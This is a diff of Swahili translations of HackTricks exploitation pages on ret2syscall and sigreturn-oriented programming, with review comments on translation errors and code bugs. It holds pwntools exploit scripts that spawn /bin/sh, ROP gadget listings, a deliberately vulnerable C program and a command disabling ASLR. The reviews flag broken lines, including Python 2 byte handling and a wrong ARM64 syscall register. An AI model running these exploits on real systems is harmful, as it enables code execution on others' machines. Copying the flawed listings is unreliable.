Syscall nyingine ya kuvutia ya kuita ni **`mprotect`** ambayo ingemruhusu mshambuliaji **kurekebisha ruhusa ya ukurasa kwenye kumbukumbu**. Hii inaweza kuunganishwa na [**ret2shellcode**](../../stack-overflow/stack-shellcode/).
{% endhint %}
## Vifaa vya Kudhibiti Virejeshi
## Vifaa vya Usajili
Tuanze kwa kutafuta **jinsi ya kudhibiti virejeshi hivyo**:
Tuanze kwa kutafuta **jinsi ya kudhibiti vifaa hivyo**:
```bash
ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x0000000000415664 : pop rax ; ret
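Review bot: Renaming the section from "Vifaa vya Kudhibiti Virejeshi" to "Vifaa vya Usajili" and the sentence to "jinsi ya kudhibiti vifaa hivyo" changes the meaning from controlling the registers to controlling the gadgets, and "usajili" means registration rather than a CPU register; the page itself uses "rejista" a few lines later ("kuzipakia kwenye rejista"), so "Vifaa vya Rejista" and "jinsi ya kudhibiti rejista hizo" would be consistent. Separate from the translation but visible in the same hunk: the grep pattern `pop (rdi|rsi|rdx\rax) ; ret` has `\r` where `|` is intended, so as written it cannot match the `pop rax ; ret` line that the listing shows directly under it; it should read `rdx|rax`.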
@ -41,7 +41,7 @@ ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x00000000004101f3 : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret
```
Kwa kutumia anwani hizi ni **inawezekana kuandika maudhui kwenye stack na kuzipakia kwenye rejista**.
Kwa anwani hizi ni **inawezekana kuandika maudhui kwenye stack na kuzipakia kwenye rejista**.
## Andika string
@ -65,7 +65,7 @@ mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
```
### Kiotomatiki ROP mnyororo
Amri ifuatayo inaunda mnyororo kamili wa `sys_execve` ROP ukitoa binary ya tuli wakati kuna vifaa vya andika-nini-mahali na maagizo ya syscall:
Amri ifuatayo inaunda mnyororo kamili wa `sys_execve` ROP ukipewa binary ya tuli wakati kuna vifaa vya andika-nini-popote na maagizo ya syscall:
```bash
ROPgadget --binary vuln --ropchain
```
@ -111,8 +111,8 @@ rop += writeGadget #Address to: mov qword ptr [rax], rdx
Ikiwa **unakosa vifaa**, kwa mfano kuandika `/bin/sh` kumbukumbu, unaweza kutumia **mbinu ya SROP kudhibiti thamani zote za rejista** (ikiwa ni pamoja na RIP na rejista za params) kutoka kwenye steki:
{% content-ref url="../srop-sigreturn-oriented-programming.md" %}
[srop-sigreturn-oriented-programming.md](../srop-sigreturn-oriented-programming.md)
{% content-ref url="../srop-sigreturn-oriented-programming/" %}
[srop-sigreturn-oriented-programming](../srop-sigreturn-oriented-programming/)
{% endcontent-ref %}
```python
from pwn import *
@ -183,8 +183,8 @@ target.interactive()
## Mifano Mingine & Marejeo
* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html)
* Biti 64, hakuna PIE, nx, andika kwenye kumbukumbu fulani ROP ili kuita `execve` na ruka hapo.
* Biti 64, hakuna PIE, nx, andika kwenye kumbukumbu fulani ROP ili kupiga simu kwa `execve` na ruka hapo.
* [https://guyinatuxedo.github.io/07-bof\_static/bkp16\_simplecalc/index.html](https://guyinatuxedo.github.io/07-bof\_static/bkp16\_simplecalc/index.html)
* Biti 64, nx, hakuna PIE, andika kwenye kumbukumbu fulani ROP ili kuita `execve` na ruka hapo. Ili kuandika kwenye steki kazi ya kufanya operesheni za hisabati inatumika vibaya
* Biti 64, nx, hakuna PIE, andika kwenye kumbukumbu fulani ROP ili kupiga simu kwa `execve` na ruka hapo. Ili kuandika kwenye steki kazi ya kufanya operesheni za hisabati inatumika vibaya
* [https://guyinatuxedo.github.io/07-bof\_static/dcquals16\_feedme/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals16\_feedme/index.html)
* Biti 64, hakuna PIE, nx, BF canary, andika kwenye kumbukumbu fulani ROP ili kuita `execve` na ruka hapo.
* Biti 64, hakuna PIE, nx, BF canary, andika kwenye kumbukumbu fulani ROP ili kupiga simu kwa `execve` na ruka hapo.

View file

@ -2,7 +2,7 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -10,11 +10,11 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
Pata maelezo ya arm64 katika:
Pata utangulizi wa arm64 katika:
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
@ -58,7 +58,7 @@ Ili kuandaa wito kwa **syscall** inahitajika mazingira yafuatayo:
- `x1: 0 taja hakuna hoja zilizopitishwa`
- `x2: 0 taja hakuna mazingira ya mazingira yaliyopitishwa`
Kwa kutumia ROPgadget.py niliweza kutambua vifaa vifuatavyo:
Kutumia ROPgadget.py niliweza kutambua vifaa vifuatavyo katika maktaba ya libc ya mashine:
{% code overflow="wrap" %}
```armasm
@ -81,6 +81,10 @@ svc #0
Kwa vifaa vya awali tunaweza kudhibiti rejista zote zinazohitajika kutoka kwenye steki na kutumia x5 kuruka kwenye kifaa cha pili ili kuita syscall.
{% hint style="success" %}
Tafadhali kumbuka kwamba kujua habari hii kutoka kwa maktaba ya libc pia inaruhusu kufanya shambulio la ret2libc, lakini tutumie kwa mfano huu wa sasa.
{% endhint %}
### Kudukua
```python
from pwn import *
@ -132,14 +136,14 @@ p.interactive()
```
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
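Review bot: the banner rewording introduced here ("kuvamia", "MIPANGO YA KUJIUNGA", "NFTs ya kipekee") diverges from the banner in the two new files added by this same commit, which still read "kudukua", "MIPANGO YA USAJILI" and "mkusanyiko wetu wa kipekee wa NFTs"; the shared header and footer should be identical across pages, so pick one wording and apply it to all three files. Note also that the removed "NFTs za kipekee" agreed with the plural noun, whereas "NFTs ya kipekee" agrees with nothing in the phrase.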

@ -0,0 +1,162 @@
# SROP - Programu ya Sigreturn-Oriented
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
**`Sigreturn`** ni **syscall** maalum ambayo kimsingi hutumiwa kusafisha baada ya kikamata ishara kumaliza utekelezaji wake. Ishara ni mapumziko yanayotumwa kwa programu na mfumo wa uendeshaji, mara nyingi kumaanisha kuwa hali isiyo ya kawaida imejitokeza. Wakati programu inapokea ishara, kwa muda inasitisha kazi yake ya sasa kushughulikia ishara na **kikamata ishara**, kazi maalum iliyoundwa kushughulikia ishara.
Baada ya kikamata ishara kumaliza, programu inahitaji **kuendelea na hali yake ya awali** kana kwamba hakuna kilichotokea. Hapa ndipo **`sigreturn`** inapoingia. Inasaidia programu **kurudi kutoka kwa kikamata ishara** na kurejesha hali ya programu kwa kusafisha fremu ya steki (sehemu ya kumbukumbu inayohifadhi wito wa kazi na pembejeo za mitaa) ambayo ilitumiwa na kikamata ishara.
Sehemu inayovutia ni jinsi **`sigreturn`** inavyorejesha hali ya programu: inafanya hivyo kwa kuhifadhi **thamani zote za usajili wa CPU kwenye steki.** Ishara haizuiwi tena, **`sigreturn` inapitisha thamani hizi kutoka kwenye steki**, ikirejesha thamani za usajili wa CPU kwa hali yake kabla ya ishara kushughulikiwa. Hii ni pamoja na usajili wa kidhibiti wa steki (RSP), ambao unaelekeza kwenye sehemu ya juu ya sasa ya steki.
{% hint style="danger" %}
Kuita syscall **`sigreturn`** kutoka kwa mnyororo wa ROP na **kuongeza thamani za usajili** tungependa iweke kwenye **steki** inawezekana **kudhibiti** thamani zote za usajili na hivyo **kuita** kwa mfano syscall `execve` na `/bin/sh`.
{% endhint %}
Tafadhali angalia jinsi hii itakuwa **aina ya Ret2syscall** ambayo inafanya iwe rahisi kudhibiti vigezo vya kuita Ret2syscalls nyingine:
{% content-ref url="../rop-syscall-execv/" %}
[rop-syscall-execv](../rop-syscall-execv/)
{% endcontent-ref %}
Ikiwa una hamu hii ni **muundo wa sigcontext** uliohifadhiwa kwenye steki kwa kupona thamani baadaye (mtaalam kutoka [**hapa**](https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html)):
```
+--------------------+--------------------+
| rt_sigeturn() | uc_flags |
+--------------------+--------------------+
| &uc | uc_stack.ss_sp |
+--------------------+--------------------+
| uc_stack.ss_flags | uc.stack.ss_size |
+--------------------+--------------------+
| r8 | r9 |
+--------------------+--------------------+
| r10 | r11 |
+--------------------+--------------------+
| r12 | r13 |
+--------------------+--------------------+
| r14 | r15 |
+--------------------+--------------------+
| rdi | rsi |
+--------------------+--------------------+
| rbp | rbx |
+--------------------+--------------------+
| rdx | rax |
+--------------------+--------------------+
| rcx | rsp |
+--------------------+--------------------+
| rip | eflags |
+--------------------+--------------------+
| cs / gs / fs | err |
+--------------------+--------------------+
| trapno | oldmask (unused) |
+--------------------+--------------------+
| cr2 (segfault addr)| &fpstate |
+--------------------+--------------------+
| __reserved | sigmask |
+--------------------+--------------------+
```
Kwa maelezo bora angalia pia:
{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
## Mfano
Unaweza [**kupata mfano hapa**](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop/using-srop) ambapo wito wa signeturn unajengwa kupitia ROP (kuweka katika rxa thamani `0xf`), ingawa hii ni shambulizi la mwisho kutoka hapo:
```python
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = process()
BINSH = elf.address + 0x1250
POP_RAX = 0x41018
SYSCALL_RET = 0x41015
frame = SigreturnFrame()
frame.rax = 0x3b # syscall number for execve
frame.rdi = BINSH # pointer to /bin/sh
frame.rsi = 0x0 # NULL
frame.rdx = 0x0 # NULL
frame.rip = SYSCALL_RET
payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf) # 0xf is the number of the syscall sigreturn
payload += p64(SYSCALL_RET)
payload += bytes(frame)
p.sendline(payload)
p.interactive()
```
Angalia pia [**exploit kutoka hapa**](https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html) ambapo binary ilikuwa tayari inaita `sigreturn` na kwa hivyo haifai kujenga hiyo na **ROP**:
```python
from pwn import *
# Establish the target
target = process("./small_boi")
#gdb.attach(target, gdbscript = 'b *0x40017c')
#target = remote("pwn.chal.csaw.io", 1002)
# Establish the target architecture
context.arch = "amd64"
# Establish the address of the sigreturn function
sigreturn = p64(0x40017c)
# Start making our sigreturn frame
frame = SigreturnFrame()
frame.rip = 0x400185 # Syscall instruction
frame.rax = 59 # execve syscall
frame.rdi = 0x4001ca # Address of "/bin/sh"
frame.rsi = 0x0 # NULL
frame.rdx = 0x0 # NULL
payload = "0"*0x28 # Offset to return address
payload += sigreturn # Function with sigreturn
payload += str(frame)[8:] # Our sigreturn frame, adjusted for the 8 byte return shift of the stack
target.sendline(payload) # Send the target payload
# Drop to an interactive shell
target.interactive()
```
## Mifano Mingine & Marejeo
* [https://youtu.be/ADULSwnQs-s?feature=shared](https://youtu.be/ADULSwnQs-s?feature=shared)
* [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop)
* [https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html](https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html)
* Programu ya ushirikiano wa kufunga ambayo inaruhusu **kuandika kwenye stack** na kisha kuita **syscall ya `sigreturn`**. Inawezekana kuandika kwenye stack [**ret2syscall**](../rop-syscall-execv/) kupitia muundo wa **sigreturn** na kusoma bendera ambayo iko ndani ya kumbukumbu ya programu ya ushirikiano.
* [https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html](https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html)
* Programu ya ushirikiano wa kufunga ambayo inaruhusu **kuandika kwenye stack** na kisha kuita **syscall ya `sigreturn`**. Inawezekana kuandika kwenye stack [**ret2syscall**](../rop-syscall-execv/) kupitia muundo wa **sigreturn** (programu ya ushirikiano ina string `/bin/sh`).
* [https://guyinatuxedo.github.io/16-srop/inctf17\_stupidrop/index.html](https://guyinatuxedo.github.io/16-srop/inctf17\_stupidrop/index.html)
* Biti 64, hakuna relro, hakuna canary, nx, hakuna pie. Uvujaji rahisi wa buffer unaoabuse kazi ya `gets` bila vifaa vya kutekeleza [**ret2syscall**](../rop-syscall-execv/). Mnyororo wa ROP unaandika `/bin/sh` katika `.bss` kwa kuita tena gets, inatumia kazi ya **`alarm`** kuweka eax kuwa `0xf` ili kuita **SROP** na kutekeleza kifaa cha shell.
* [https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html](https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html)
* Programu ya ushirikiano ya biti 64, hakuna relro, hakuna canary, nx, hakuna pie. Mchakato unaruhusu kuandika kwenye stack, kudhibiti vijenzi kadhaa, na kuita syscall na kisha kuita `exit`. Kifaa cha syscall kilichochaguliwa ni `sigreturn` ambacho kitaweka vijenzi na kuhamisha `eip` kuita maagizo ya awali ya syscall na kukimbia `memprotect` kuweka nafasi ya programu kuwa `rwx` na kuweka ESP katika nafasi ya programu. Kufuata mchakato, programu itaita kusoma intro ESP tena, lakini katika kesi hii ESP itakuwa inaelekeza kwa maagizo yanayofuata hivyo kupitisha shellcode itaandika kama maagizo yanayofuata na kuyatekeleza.
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
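Review bot: the small_boi listing in the new README is Python 2 code: `payload = "0"*0x28` is a str, so `payload += sigreturn` (a `p64` bytes value) raises TypeError on Python 3, and `str(frame)[8:]` yields a dict repr rather than the frame bytes; for a Python 3 pwntools setup this needs `payload = b"0"*0x28` and `payload += bytes(frame)[8:]`, or a sentence saying the listing is Python 2 as taken from the linked writeup. Translation issues in the same hunk: "(mtaalam kutoka hapa)" renders "example from here" as "expert from here" and should be "(mfano kutoka hapa)"; "signeturn" and "rxa" in the Mfano section are typos for "sigreturn" and "rax"; "rt_sigeturn()" in the frame diagram should be "rt_sigreturn()"; "Programu ya ushirikiano" in the references translates "assembly" in the sense of collaboration, where the source means an assembly binary; and "Uvujaji rahisi wa buffer" ("simple buffer leak") describes an overflow ("kufurika kwa buffer").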

@ -0,0 +1,57 @@
# SROP - ARM64
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Code
```c
#include <stdio.h>
#include <string.h>
void do_stuff(int do_arg){
if (do_arg == 1)
__asm__("mov x0, #139; svc #0;");
return;
}
char* vulnerable_function() {
char buffer[64];
fgets(buffer, sizeof(buffer)*3, stdin);
return buffer;
}
int main(int argc, char **argv) {
char* b = vulnerable_function();
do_stuff(2);
return 0;
}
```
Sakinisha kwa:
```bash
clang -o srop srop.c -fno-stack-protector
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # Disable ASLR
```
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
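Review bot: in the C sample, `__asm__("mov x0, #139; svc #0;")` loads the syscall number into x0, but the AArch64 Linux syscall ABI takes the number in x8 (x0 to x5 carry the arguments), so as written this gadget does not issue rt_sigreturn (139); `mov x8, #139; svc #0` is what the page's technique relies on. `vulnerable_function` also returns the address of the stack local `buffer`, which is undefined behaviour unrelated to the intended fgets overflow; making it return void keeps the example focused on the one bug it means to show. On the prose: "## Code" is left untranslated, "Sakinisha kwa:" means "Install with:" where the block compiles and builds the binary, and the footer banner uses "AWS hacking" and "kuhack" where the header banner of the same file uses "kudukua".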